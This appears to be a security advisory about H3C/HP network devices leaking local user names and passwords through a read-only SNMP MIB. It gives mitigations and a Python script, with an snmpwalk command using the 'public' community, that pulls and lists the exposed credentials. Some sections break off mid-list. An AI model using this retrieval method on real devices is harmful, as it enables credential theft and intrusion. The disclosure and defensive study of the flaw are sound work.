The MIBs h3c-user.mib and hh3c-user.mib, for the purpose of this
document, will be referred to as (h)h3c-user.mib. This MIB defines the
internal table and objects to "Manage configuration and Monitor running
state for userlog feature."

This means the MIB holds objects whose data penetration testers or
malicious actors would want to get their dirty little hands on. Most of
those objects are only accessible with the read/write community string.

In the revision history of (h)h3c-user.mib, version 2.0 changed the
MAX-ACCESS of the following objects within the (h)h3cUserInfoEntry
sequence from read-only to read-create:

(h)h3cUserName
(h)h3cUserPassword
(h)h3cAuthMode
(h)h3cUserLevel

The purpose of these objects is to expose the locally configured users
to anyone holding a valid SNMP community. After the change, only holders
of the read-write community string should have been able to retrieve
them; in practice this was not the case, and the device code still
honoured the earlier read-only access.

So if you have the read-only SNMP community string (typically "public"),
you can read every one of these entries, user names and passwords
included.
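The following Python script is an added example and is not code from the advisory or from h3c-pt-tools. It takes the text output of a numeric snmpwalk of the user table, groups it into per-user records, and reports which users came back with a password value; the embedded walk lines are a constructed sample, not a real capture. The numeric OIDs of (h)h3cUserInfoEntry under the 2011.10.2 and 25506.2 enterprise arcs, the column order, and the snmpwalk command line shown in the docstring are assumptions that should be verified against the vendor MIB before use.

```python
"""Group a numeric snmpwalk of the (h)h3c user table into per-user records.

Added example, not code from the advisory or from h3c-pt-tools. The OIDs
below are assumptions and must be checked against h3c-user.mib /
hh3c-user.mib. A walk such as

    snmpwalk -v2c -c public -On <target> 1.3.6.1.4.1.25506.2.12.1.1.1

is assumed to produce the Net-SNMP "-On" line format parsed here.
"""
import re
from collections import defaultdict

# ASSUMPTION: (h)h3cUserInfoEntry under the h3c and hh3c enterprise arcs.
USER_ENTRY_OIDS = {
    "h3c": "1.3.6.1.4.1.2011.10.2.12.1.1.1",
    "hh3c": "1.3.6.1.4.1.25506.2.12.1.1.1",
}
# ASSUMPTION: column sub-identifiers inside the entry, in MIB order.
COLUMNS = {1: "name", 2: "password", 3: "auth_mode", 4: "level"}

# One "-On" output line: .<oid> = <TYPE>: <value>
WALK_LINE = re.compile(
    r"^\.?(?P<oid>\d+(?:\.\d+)+)\s*=\s*(?P<type>[A-Za-z0-9-]+):\s*(?P<value>.*)$"
)


def _decode(vtype, raw):
    """Turn the textual snmpwalk value into a Python value."""
    raw = raw.strip()
    if vtype == "INTEGER":
        # Net-SNMP may print an enumeration as "label(7)"; keep the number.
        m = re.search(r"-?\d+", raw)
        return int(m.group()) if m else raw
    if vtype == "STRING":
        return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] == '"' else raw
    if vtype == "Hex-STRING":
        return bytes.fromhex(raw.replace(" ", "")).decode("latin-1")
    return raw


def parse_user_walk(lines):
    """Return {index: {"name", "password", "auth_mode", "level"}}.

    The table index is whatever OID suffix follows the column number, so
    this works whether the entry is indexed by user name or by an integer.
    """
    users = defaultdict(dict)
    for line in lines:
        m = WALK_LINE.match(line.strip())
        if not m:
            continue
        oid = m.group("oid")
        for base in USER_ENTRY_OIDS.values():
            if not oid.startswith(base + "."):
                continue
            col, _, index = oid[len(base) + 1:].partition(".")
            field = COLUMNS.get(int(col))
            if field:
                users[index][field] = _decode(m.group("type"), m.group("value"))
            break
    return dict(users)


def exposed_credentials(users):
    """Users for which the walk returned a password value.

    A non-empty result from a walk done with the read-only community
    means the device still hands out (h)h3cUserPassword, whatever the
    MIB's read-create MAX-ACCESS says.
    """
    return {idx: u for idx, u in users.items() if u.get("password")}


# Constructed sample resembling "snmpwalk -On" output; not a real capture.
# The auth_mode values and the cipher placeholder are illustrative only.
SAMPLE_WALK = """
.1.3.6.1.4.1.25506.2.12.1.1.1.1.5.97.100.109.105.110 = STRING: "admin"
.1.3.6.1.4.1.25506.2.12.1.1.1.2.5.97.100.109.105.110 = STRING: "Summer2012"
.1.3.6.1.4.1.25506.2.12.1.1.1.3.5.97.100.109.105.110 = INTEGER: 0
.1.3.6.1.4.1.25506.2.12.1.1.1.4.5.97.100.109.105.110 = INTEGER: 3
.1.3.6.1.4.1.25506.2.12.1.1.1.1.6.98.97.99.107.117.112 = STRING: "backup"
.1.3.6.1.4.1.25506.2.12.1.1.1.2.6.98.97.99.107.117.112 = STRING: "CIPHERTEXT-PLACEHOLDER"
.1.3.6.1.4.1.25506.2.12.1.1.1.3.6.98.97.99.107.117.112 = INTEGER: 7
.1.3.6.1.4.1.25506.2.12.1.1.1.4.6.98.97.99.107.117.112 = INTEGER: 1
""".strip().splitlines()

if __name__ == "__main__":
    for idx, u in exposed_credentials(parse_user_walk(SAMPLE_WALK)).items():
        print(f"{u['name']!r:12} level={u['level']} auth_mode={u['auth_mode']} "
              f"password={u['password']!r}")
```

Run the walk with the read-only community and feed the output in; every user returned by exposed_credentials() confirms the behaviour described above on that device. The script deliberately does not interpret (h)h3cAuthMode and reports the raw integer, since the meaning of each value has to come from the MIB.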

Why this is impactful
---------------------

The (h)h3cUserPassword object is presented in one of three formats, as
defined by the (h)h3cAuthMode object, and mirrors how the password is
stored in the device configuration:

These will soon be posted to https://github.com/grutz/h3c-pt-tools, and
requests will be made to have them added to each tool.

Mitigation
----------

By itself this is already bad, but users who do any of the following
may already be protected:

1. Use complex SNMP community strings or disable SNMPv1
2. Have disabled the MIB entries for (h)h3c-user
3. Block SNMP using access controls or firewalls
4. Do not define local users; use RADIUS or TACACS+ instead

More specific procedures can be found in the vendor's release.

Why this is a bigger problem
----------------------------

People make poor choices. They like to think their equipment won't rat
them out, so they use cleartext passwords on networking equipment.

The cipher is an interesting one because it's basically an unknown...
What, you think the only thing I had to share at Toorcon was SNMP and
some cleartext credentials?

Timeline
--------

June-ish 2012: Research begins after seeing something cool on a
penetration test